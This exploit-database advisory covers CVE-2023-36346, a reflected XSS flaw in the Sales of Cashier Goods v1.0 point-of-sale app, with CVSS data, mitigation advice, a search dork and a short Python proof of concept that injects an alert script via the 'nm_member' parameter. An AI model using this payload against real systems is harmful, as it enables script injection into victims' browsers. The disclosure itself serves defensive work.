Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

vendor:

Sales of Cashier Goods

by:

Amirhossein Bahramizadeh

6.1

CVSS

MEDIUM

Cross Site Scripting (XSS)

CWE

Product Name: Sales of Cashier Goods

Affected Version From: Sales of Cashier Goods v1.0

Affected Version To: Sales of Cashier Goods v1.0

Patch Exists: NO

Related CWE: CVE-2023-36346

CPE: a:codekop:sales_of_cashier_goods:1.0

Metasploit:

Other Scripts:

Tags: packetstorm,cve,cve2023,xss,pos,codekop,unauth

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Nuclei References: https://yuyudhn.github.io/pos-codekop-vulnerability/, https://www.youtube.com/watch?v=bbbA-q1syrA, https://nvd.nist.gov/vuln/detail/CVE-2023-36346, http://packetstormsecurity.com/files/173280/Sales-Of-Cashier-Goods-1.0-Cross-Site-Scripting.html

Nuclei Metadata: {'max-request': 1, 'verified': 'true', 'vendor': 'codekop', 'product': 'codekop'}

Platforms Tested: Windows, Linux

2023

Sales of Cashier Goods v1.0 – Cross Site Scripting (XSS)

This exploit demonstrates a Cross Site Scripting (XSS) vulnerability in the Sales of Cashier Goods v1.0 web application. By injecting a malicious script, an attacker can execute arbitrary code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and output encoding to prevent the execution of malicious scripts.

Source

Exploit-DB raw data:

# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)